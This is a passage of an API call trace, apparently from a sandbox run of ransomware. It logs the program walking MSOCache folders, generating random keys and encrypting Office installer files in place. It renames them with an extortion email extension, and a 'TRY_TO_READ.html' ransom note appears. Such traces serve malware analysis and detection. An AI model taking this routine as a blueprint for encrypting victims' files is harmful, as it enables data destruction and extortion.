	[0068.437] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 75
	[0068.437] GetProcessHeap () returned 0x540000
	[0068.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0068.437] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab"
	[0068.437] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.438] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.440] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468
	[0068.440] GetProcessHeap () returned 0x540000
	[0068.440] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0068.440] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14819276) returned 1
	[0068.440] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe21fcc
	[0068.441] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.441] GetProcessHeap () returned 0x540000
	[0068.441] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.441] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.441] WriteFile (in: hFile=0x468, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.443] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.443] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.443] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe21fcc) returned 0x3a20020
	[0068.444] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe21fcc) returned 0x4850020
	[0068.444] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.444] ReadFile (in: hFile=0x468, lpBuffer=0x3a20020, nNumberOfBytesToRead=0xe21fcc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0xe21fcc, lpOverlapped=0x0) returned 1
	[0069.309] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da130
	[0069.309] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.309] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.309] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.310] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.310] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.310] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.310] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.310] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.310] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.310] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.310] GetLastError () returned 0x0
	[0069.311] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1
	[0069.311] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589008
	[0069.311] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0069.311] GetLastError () returned 0x0
	[0069.311] FindNextFileW (in: hFindFile=0x5da130, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db440
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0069.311] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0069.311] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0069.311] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", dwFileAttributes=0x80) returned 1
	[0069.311] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 75
	[0069.311] GetProcessHeap () returned 0x540000
	[0069.311] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0069.311] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml"
	[0069.311] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0069.312] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0069.314] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c
	[0069.314] GetProcessHeap () returned 0x540000
	[0069.314] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0069.314] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1800) returned 1
	[0069.314] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x708
	[0069.314] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0069.314] GetProcessHeap () returned 0x540000
	[0069.314] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0069.314] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0069.314] WriteFile (in: hFile=0x46c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0069.318] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0069.318] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0069.318] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x708) returned 0x5db4e8
	[0069.318] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x708) returned 0x5dbbf8
	[0069.318] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0069.318] ReadFile (in: hFile=0x46c, lpBuffer=0x5db4e8, nNumberOfBytesToRead=0x708, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db4e8*, lpNumberOfBytesRead=0x3a1f778*=0x708, lpOverlapped=0x0) returned 1
	[0069.318] SetFilePointer (in: hFile=0x46c, lDistanceToMove=-1800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0069.318] WriteFile (in: hFile=0x46c, lpBuffer=0x5dbbf8*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbbf8*, lpNumberOfBytesWritten=0x3a1f778*=0x708, lpOverlapped=0x0) returned 1
	[0069.321] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4e8 | out: hHeap=0x540000) returned 1
	[0069.321] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbbf8 | out: hHeap=0x540000) returned 1
	[0069.321] CloseHandle (hObject=0x46c) returned 1
	[0069.322] GetProcessHeap () returned 0x540000
	[0069.322] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0069.322] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0069.322] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0069.322] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db440 | out: hHeap=0x540000) returned 1
	[0069.322] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db398 | out: hHeap=0x540000) returned 1
	[0069.322] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db398
	[0069.322] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0069.322] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0069.322] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0069.322] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0069.322] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", dwFileAttributes=0x80) returned 1
	[0069.322] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 75
	[0069.322] GetProcessHeap () returned 0x540000
	[0069.322] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0069.322] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi"
	[0069.322] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0069.322] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0069.325] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c
	[0069.325] GetProcessHeap () returned 0x540000
	[0069.326] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0069.326] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2522624) returned 1
	[0069.326] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x267e00
	[0069.326] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0069.326] GetProcessHeap () returned 0x540000
	[0069.326] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0069.326] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0069.326] WriteFile (in: hFile=0x46c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0069.328] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0069.328] WriteFile (in: hFile=0x46c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0069.328] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x267e00) returned 0x3a20020
	[0069.328] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x267e00) returned 0x3c90020
	[0069.329] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0069.329] ReadFile (in: hFile=0x46c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x267e00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x267e00, lpOverlapped=0x0) returned 1
	[0069.528] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0069.528] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0069.528] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", dwFileAttributes=0x80) returned 1
	[0069.528] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 74
	[0069.528] GetProcessHeap () returned 0x540000
	[0069.528] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0069.528] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab"
	[0069.528] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
